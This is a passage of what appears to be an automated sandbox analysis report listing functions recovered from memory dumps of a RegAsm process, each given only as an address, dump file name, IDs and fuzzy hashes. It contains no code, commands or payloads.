                                      • Snapshot File: hcaresult_2_2_6600000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e8ee1ae278fe4ce61d477498470f0aa0ad80907e3125df45df3497e69a0646b0
                                      • Instruction ID: 3539ba43ee894a4e540a3bac79ce7cf34e911854707f90b3865a4c7b695e9994
                                      • Opcode Fuzzy Hash: e8ee1ae278fe4ce61d477498470f0aa0ad80907e3125df45df3497e69a0646b0
                                      • Instruction Fuzzy Hash: EF118F30F002468FEB5C9E79D89467F7AA6AB88751F148539E905A7394EF30DD1187D0
                                      Function 06660D3F Relevance: .1, Instructions: 60COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f86056fde1e8931697ed3036ea903b04d1fc3f25251061701d180b76edb54c77
                                      • Instruction ID: 9b090fc38038f0b7a2c1fba8481cf2825134577e7ea525c0734d79e9257c1afd
                                      • Opcode Fuzzy Hash: f86056fde1e8931697ed3036ea903b04d1fc3f25251061701d180b76edb54c77
                                      • Instruction Fuzzy Hash: 84211275E012189BDB58DFAAE8406DDFBF2EF88311F14812AE414B3350DB341986CF91
                                      Function 06669500 Relevance: .1, Instructions: 59COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bbbad1a409a6bc6076c9e3e316a5e526870ad1f9ed8eaf764ff62952d1013964
                                      • Instruction ID: 95c8e6025ae113ddb4b1353dd0ff6979e5ec4f8437314a7dc68c72f17636fdc1
                                      • Opcode Fuzzy Hash: bbbad1a409a6bc6076c9e3e316a5e526870ad1f9ed8eaf764ff62952d1013964
                                      • Instruction Fuzzy Hash: 28210474E052099FCB50DFA8E5449AEBBF1EF49301F1085AAE858E7350E7319A41CF81
                                      Function 06688778 Relevance: .1, Instructions: 57COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c952872608c7413410c6e8d336620e28ee8bbedf00fb56551ce6e7232e5cc630
                                      • Instruction ID: e593b806f2cf1fa7f52b9afe4388733cbe27298325204ef187b66a9476004782
                                      • Opcode Fuzzy Hash: c952872608c7413410c6e8d336620e28ee8bbedf00fb56551ce6e7232e5cc630
                                      • Instruction Fuzzy Hash: C4218074E002189FCB44DFA9E9849DDBBF6BF88310F14916AE814AB354DB71A946CF50
                                      Function 0668DB38 Relevance: .1, Instructions: 56COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: aaaec7442bc4f4a4159b1e4542cd5d98830c00d4a29fcc343c7459aacdcf1c03
                                      • Instruction ID: 58a40dd40ae9640419aaa2f74de01e86d977dd1ce3baa1b2d1dca9e73b87245c
                                      • Opcode Fuzzy Hash: aaaec7442bc4f4a4159b1e4542cd5d98830c00d4a29fcc343c7459aacdcf1c03
                                      • Instruction Fuzzy Hash: B721E3B5E0424A9FCB41CFA8D840AEEBFB2EF48311F04406AEA54A7351D7359994CFA0
                                      Function 0666EC90 Relevance: .1, Instructions: 56COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ea01a1eb1455bb08257067a0905d197888a062084c17902ba36b6024912e2068
                                      • Instruction ID: c17b11f1941fdb820a3b3193298cc274e0445c27c35ba8dc95cb3a67e759a245
                                      • Opcode Fuzzy Hash: ea01a1eb1455bb08257067a0905d197888a062084c17902ba36b6024912e2068
                                      • Instruction Fuzzy Hash: B5113774E04209CFCB94DFA9E4443AEBBF1EB48301F1480AAE819E3380E6754A41CF91
                                      Function 066622F0 Relevance: .1, Instructions: 56COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 10c623c1682d20f750065d09e559e838cd7faa1dcd9b71d6f380cebf75557880
                                      • Instruction ID: d610bf233f50f0eb4f0ae32cb7f72c50dae6476011b0ebab469a42e848d8af28
                                      • Opcode Fuzzy Hash: 10c623c1682d20f750065d09e559e838cd7faa1dcd9b71d6f380cebf75557880
                                      • Instruction Fuzzy Hash: 9F21E3B5D01259AFCB00CF9AD884ADEFBB8FB49314F10812AE918B7200C375A944CBA5
                                      Function 06669618 Relevance: .1, Instructions: 55COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f1d0a4088dd8d54be83683e06dbd2b4fac6d88c2a1a890d3db466a10fb2d1081
                                      • Instruction ID: 1335fb9afd89a3f3658623056c25fb19bb560ec703cc7c6eeec04fb4acb6e8fd
                                      • Opcode Fuzzy Hash: f1d0a4088dd8d54be83683e06dbd2b4fac6d88c2a1a890d3db466a10fb2d1081
                                      • Instruction Fuzzy Hash: B5114970E002689FDB14CFAAD844ADDBBB2FF89300F0081AAE915AB355D7705A49CF91
                                      Function 06669ED0 Relevance: .1, Instructions: 55COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 939a8257261f17619ede207d8033e98861bffb5b7475500e8a5f06e312516e08
                                      • Instruction ID: ad356c9d13c1c5faca7dd58d849673b1bbe5515c6c7fc8e7d5c7be9cdc516d87
                                      • Opcode Fuzzy Hash: 939a8257261f17619ede207d8033e98861bffb5b7475500e8a5f06e312516e08
                                      • Instruction Fuzzy Hash: 1C112674E002199FCB48DFAAD8046DEBBF6BF89310F04C12AE825A7354DB705845CFA0
                                      Function 0666A200 Relevance: .1, Instructions: 54COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 97b95df0671ae7a618e654c0f54f725216353f49afdb866244669363704b014b
                                      • Instruction ID: accdc0f7142769f30bd24c4cac4cb9630fe3bd6d9395fa15fbb4cb3fcf02343f
                                      • Opcode Fuzzy Hash: 97b95df0671ae7a618e654c0f54f725216353f49afdb866244669363704b014b
                                      • Instruction Fuzzy Hash: C3113071E052499BDB18CFABD9406EEFBF6AFC9300F08C07AD918A6250DA314A05CB91
                                      Function 06603B70 Relevance: .1, Instructions: 54COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660241348.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6600000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7322a8ee857516438099a4a5c4947604e2b70ccac0c62eceac14f64658da8d6c
                                      • Instruction ID: 1b1659f0370c1dd00a50314ec1f17cc8b6f457f994b1c73f906dee1f30cb7e06
                                      • Opcode Fuzzy Hash: 7322a8ee857516438099a4a5c4947604e2b70ccac0c62eceac14f64658da8d6c
                                      • Instruction Fuzzy Hash: 4801DB30A062459FD7559A68D919BFF3BB5EB85304F14447DD001BB3D1D7724C02C7A4
                                      Function 012ED0E7 Relevance: .1, Instructions: 53COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2653905578.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_12ed000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 17de7163a1e12a4c5df783ee0f29f24f6994aba7d146e6d7d26c00eb2d5c80d5
                                      • Instruction ID: a0ccad011e1c603836cb0ad29dc92d541145bc840a15b4961b61fae8e743fb50
                                      • Opcode Fuzzy Hash: 17de7163a1e12a4c5df783ee0f29f24f6994aba7d146e6d7d26c00eb2d5c80d5
                                      • Instruction Fuzzy Hash: 3611DD75504284DFDB06CF58D9C8B15BFA1FB84318F28C6AAD9094F656C33AD44ACBA1
                                      Function 06663E38 Relevance: .1, Instructions: 53COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a1d6be9ecffd8da2336e0aedb79e9e8ce9167ef6e7a207e12b87cd2fc1c95958
                                      • Instruction ID: c93e1260bc929b05ca4691b726ff487fef0d75fda359493c9373d18c4a06b75a
                                      • Opcode Fuzzy Hash: a1d6be9ecffd8da2336e0aedb79e9e8ce9167ef6e7a207e12b87cd2fc1c95958
                                      • Instruction Fuzzy Hash: E6115E74E00109EFCB44EFA4D6446AEBBB2FF88301F6086A8D406A7354DB706E45DF91
                                      Function 0668DB48 Relevance: .1, Instructions: 52COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 065f327826d9fdd3432bb527a6eb37d4c2b6393af1d501a427810a9b40fce645
                                      • Instruction ID: 03e149d5d3500895d3e45b39d07635a3d124e2b6005a1c307576a0dd1961bbac
                                      • Opcode Fuzzy Hash: 065f327826d9fdd3432bb527a6eb37d4c2b6393af1d501a427810a9b40fce645
                                      • Instruction Fuzzy Hash: 8811B0B5E0021A9FCB44CFD9D8419EEBBB5EF48321F04406AEA14A7350D7359995DFA0
                                      Function 066622F8 Relevance: .1, Instructions: 52COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9ab9608c767857001c98de4f93711da2ca9fa96aae7e68918fa1c63fb25624dd
                                      • Instruction ID: 2b0437080c71e64cd6ff4d0d8ed765a9f54b86f41d697b4acc399e4edd75e5f5
                                      • Opcode Fuzzy Hash: 9ab9608c767857001c98de4f93711da2ca9fa96aae7e68918fa1c63fb25624dd
                                      • Instruction Fuzzy Hash: 5111B6B5D01259DFCB00CF9AD984ADEFBB4FB49314F10812AE518B7210C3756954CFA5
                                      Function 06601709 Relevance: .0, Instructions: 48COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660241348.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6600000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 904eb27d6afc5e6d793a93b5aebadb1885bb5a13a95b2688c348f535ffef453a
                                      • Instruction ID: 90cb6d7a7b1a21be7a64297a9685170feead49bc1933d4dce727a754c579891f
                                      • Opcode Fuzzy Hash: 904eb27d6afc5e6d793a93b5aebadb1885bb5a13a95b2688c348f535ffef453a
                                      • Instruction Fuzzy Hash: 041104B1D0D3844FCBA9DBF8D45529ABFF19A03210B5405BEC8D1CB792F23145028B82
                                      Function 06663360 Relevance: .0, Instructions: 47COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 34a816e61c9839dbc06f55d7bc612be42770ee9d46f67ae8a5eee04a1ebbd1ed
                                      • Instruction ID: ae8bddf3740f00c10b392c806c8bb03c404f5918282f006701ccd1fa21e8cdb6
                                      • Opcode Fuzzy Hash: 34a816e61c9839dbc06f55d7bc612be42770ee9d46f67ae8a5eee04a1ebbd1ed
                                      • Instruction Fuzzy Hash: 7411A474E0020ADFCB44EFA9D5849AEF7B2FB48300F1096A5E815A7364DB30AE45CB91
                                      Function 06663459 Relevance: .0, Instructions: 46COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 127c288824775770c38fbd7f5ea37ead05b85b835d831a83f106cb96baf85e11
                                      • Instruction ID: 251e570116155ce5b69979073ac771ebfc95ca043911cbc9b798f84dbbbb0c19
                                      • Opcode Fuzzy Hash: 127c288824775770c38fbd7f5ea37ead05b85b835d831a83f106cb96baf85e11
                                      • Instruction Fuzzy Hash: 10F0C835315200AFC3518B5DE444C86BBEFAFCA32475540A6F145DB356CB71DC0287A1
                                      Function 06665189 Relevance: .0, Instructions: 44COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b4244cbe82964b6b47295e9f7518a134220ce114ff1b360af20139dbb1c23408
                                      • Instruction ID: ce0a133b13bc9aef1a4117202806a7795dc0705b826df74b759ae0eb6bda839c
                                      • Opcode Fuzzy Hash: b4244cbe82964b6b47295e9f7518a134220ce114ff1b360af20139dbb1c23408
                                      • Instruction Fuzzy Hash: 3E016930D0124AEFCB01CFA8D800AAEBFB2EF49300F1041A6E504A7250E7715655CBA1
                                      Function 0666297A Relevance: .0, Instructions: 42COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 84fe2e04193841e6502f2cdfad1d075a17a37b56a9b86e5be8a5f6ae505d13cc
                                      • Instruction ID: 41d7862f80a484699b0293bbf074d5af1f2c5db703b472d04ff45d467c3ea12a
                                      • Opcode Fuzzy Hash: 84fe2e04193841e6502f2cdfad1d075a17a37b56a9b86e5be8a5f6ae505d13cc
                                      • Instruction Fuzzy Hash: 4F015E70E00209AFC780DFA4D55069EBFB5EF89200F1485999405AB355DA305F45CB91
                                      Function 06689ED9 Relevance: .0, Instructions: 41COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: da56a8e9ab33422c7651479a37a528e75069ae4667a050a37b18101521437fc1
                                      • Instruction ID: a73a3a4ce2a3f6b7d96732d8c11d678f706b5806c8373f47ab347e7ad2a0d01d
                                      • Opcode Fuzzy Hash: da56a8e9ab33422c7651479a37a528e75069ae4667a050a37b18101521437fc1
                                      • Instruction Fuzzy Hash: B1015A35D01259DFCB10DFA9E8001DDBBB1FF89321F2081AAE924B3201D3316925CFA1
                                      Function 0668B3F8 Relevance: .0, Instructions: 41COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 38610d2265d30c6a60c6f09518083bee7a1e64586b2f06766a936b6814e45afd
                                      • Instruction ID: e8c33f80d1689528c5de5090967deb504563ea5959f71e31ddddabde2b7ef2f4
                                      • Opcode Fuzzy Hash: 38610d2265d30c6a60c6f09518083bee7a1e64586b2f06766a936b6814e45afd
                                      • Instruction Fuzzy Hash: B401F4F0E051499FDB80EFB9DC910AEBFB1EE96240B00829AD865D3324DB355E02CB91
                                      Function 0666BAE0 Relevance: .0, Instructions: 40COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7d33d9908d08d6c220ba35a43f6dee88c28b97842b60cd61da20db50d1a8d169
                                      • Instruction ID: ab943af0b360591a1db79b7803536c4d42bed2fc6af069ef9c178c1f64c372b2
                                      • Opcode Fuzzy Hash: 7d33d9908d08d6c220ba35a43f6dee88c28b97842b60cd61da20db50d1a8d169
                                      • Instruction Fuzzy Hash: BE11F3B4E0520ADFDB44EFA8D6446AEBBF2FB49300F1081A9D909A7351DB715E05CFA1
                                      Function 066901F5 Relevance: .0, Instructions: 40COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660509567.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6690000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9c7a44bbe8ed38890b23e66a26cd0b90fca04d420c49fd86a2c7d7047c53de6a
                                      • Instruction ID: 84e5fd5e30d76d8e4d2e298108f803382918e46330dfa64a9ca0c0777c75f144
                                      • Opcode Fuzzy Hash: 9c7a44bbe8ed38890b23e66a26cd0b90fca04d420c49fd86a2c7d7047c53de6a
                                      • Instruction Fuzzy Hash: 85014434D18248DFDF81DFA8D8492ACBBB5FB06300F1881EAC858E7282D7344A55CB62
                                      Function 0666EC80 Relevance: .0, Instructions: 38COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: aab6469d16451fab6d577e71e313bc62bd3f651abbfe2b861e736642181082f5
                                      • Instruction ID: e9b454f876574ccecf55f002d01a1778c956d1e14345ce8aba105f960db7dc80
                                      • Opcode Fuzzy Hash: aab6469d16451fab6d577e71e313bc62bd3f651abbfe2b861e736642181082f5
                                      • Instruction Fuzzy Hash: 0F0104B0D0620A8FCB95DFAAD5042AEBFF1AF49200F1481AAE414E3351E7750A41CFA1
                                      Function 066627E8 Relevance: .0, Instructions: 37COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4a1d7de7740d793847b729e1c1805f7d539991093ccd499ba09c460b05c3e57c
                                      • Instruction ID: fa27105091fe3a12787accd78796d49a816b36cdb03038257142fe919ae8b03d
                                      • Opcode Fuzzy Hash: 4a1d7de7740d793847b729e1c1805f7d539991093ccd499ba09c460b05c3e57c
                                      • Instruction Fuzzy Hash: 41011970D05309EFDB81EFB9E9082ADBFF5AB49200F1085AAE414E3351E7344B45CB61
                                      Function 0668B38F Relevance: .0, Instructions: 36COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f7515f336bc6fd048664b3294ef2a08f44882c5231bfb9048ccf71e47dadce48
                                      • Instruction ID: ec74220009fb94f5c02c79e9b7a53227c7fcaff5884277a7d88dc7775a390fd9
                                      • Opcode Fuzzy Hash: f7515f336bc6fd048664b3294ef2a08f44882c5231bfb9048ccf71e47dadce48
                                      • Instruction Fuzzy Hash: 63011DB0D05249AFDB45EFA9D8406EEBFF6FF49300F00859AE864A3351D7340A15CB91
                                      Function 06669D9F Relevance: .0, Instructions: 36COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7caf8ea68016b69044d189a52975f3f3d2209427ed7593d81fb6653031c9175d
                                      • Instruction ID: b653bbfe47bace4f36e2610d69c0d6f72e5da17dfce6a5d52c58b8d92753d08c
                                      • Opcode Fuzzy Hash: 7caf8ea68016b69044d189a52975f3f3d2209427ed7593d81fb6653031c9175d
                                      • Instruction Fuzzy Hash: B6F037B0D06209AFCB41DFA8D9406EEBFF6BF49300F1045AAE408E7311DB745A11CBA1
                                      Function 06665258 Relevance: .0, Instructions: 36COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 593a5c2f4982955a1300b744050cb8acc4395690b66842c2350da122b949d0cf
                                      • Instruction ID: e33de7992e74f490a9b3c22162bc61b14c47b6278de0840524ff7d7cb037cf87
                                      • Opcode Fuzzy Hash: 593a5c2f4982955a1300b744050cb8acc4395690b66842c2350da122b949d0cf
                                      • Instruction Fuzzy Hash: 4E01D274D01208EFCB41EFA8D544A9DBBF5FB09310F1485AAE814E7361D7309A45DF91
                                      Function 0666BAF0 Relevance: .0, Instructions: 36COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8197dc6304178b969660bf2d98d40c0f328181503a53d707026e270795428dae
                                      • Instruction ID: e1a8252fdcad0c7ad244ad4e8919795d1d1042828d66d31f186034148be07bc9
                                      • Opcode Fuzzy Hash: 8197dc6304178b969660bf2d98d40c0f328181503a53d707026e270795428dae
                                      • Instruction Fuzzy Hash: 7E01A5B4E0110ADFCB44DFA8D6446AEBBF1FB48300F1081A9D905A7354DB70AE05CFA1
                                      Function 066629FC Relevance: .0, Instructions: 36COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 20aa19a2432e6e9b8ef607aeac45486d5fdb2571afd53f6dcf67805b45dfcf77
                                      • Instruction ID: 13d9ae840c7f8ba3acd1d1b53487f792e9cc11627d4290026ba224fdbd87baae
                                      • Opcode Fuzzy Hash: 20aa19a2432e6e9b8ef607aeac45486d5fdb2571afd53f6dcf67805b45dfcf77
                                      • Instruction Fuzzy Hash: 03F02471E04188AFC740CFA4D4605AEBF7AEF82300B0483C6E856AB365D3309F06CB91
                                      Function 06690210 Relevance: .0, Instructions: 36COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660509567.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6690000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d5c94935950bfcd268f2b9cb3a59b48a111fb3c4646c5047f414ada70f5322a5
                                      • Instruction ID: 26f9c7f46bba8922316c3d55ecf9ad4f34dd9cd7f19bb82e66bc9c5d1e227c79
                                      • Opcode Fuzzy Hash: d5c94935950bfcd268f2b9cb3a59b48a111fb3c4646c5047f414ada70f5322a5
                                      • Instruction Fuzzy Hash: 9801E874E10209DFDF84EFE8E4496ADBBF5BB88304F1085A9C865A7344DB305A55CB62
                                      Function 066016B0 Relevance: .0, Instructions: 36COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660241348.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6600000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: df0999f45890e9186c2f1656c2f82f8e279d43f504358edec89036c243801ec7
                                      • Instruction ID: ba2741d50a1c025e10b901cb74e889524f789352699a5d1d6fc11aaa3781e0f8
                                      • Opcode Fuzzy Hash: df0999f45890e9186c2f1656c2f82f8e279d43f504358edec89036c243801ec7
                                      • Instruction Fuzzy Hash: 2CF0A0322904208FC704DBBCD88AEA877E8EF0962574900E2F509CBB31D669EC91CBC1
                                      Function 06603B80 Relevance: .0, Instructions: 36COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660241348.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6600000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 75566c1a6466c1f8c2bfa13494e3515c537e39fe9acd354c4c503c23dc47db06
                                      • Instruction ID: dc7c61267651b2a8354c90142f9c79c7fece7852ba2425869e1530280fcf0d4b
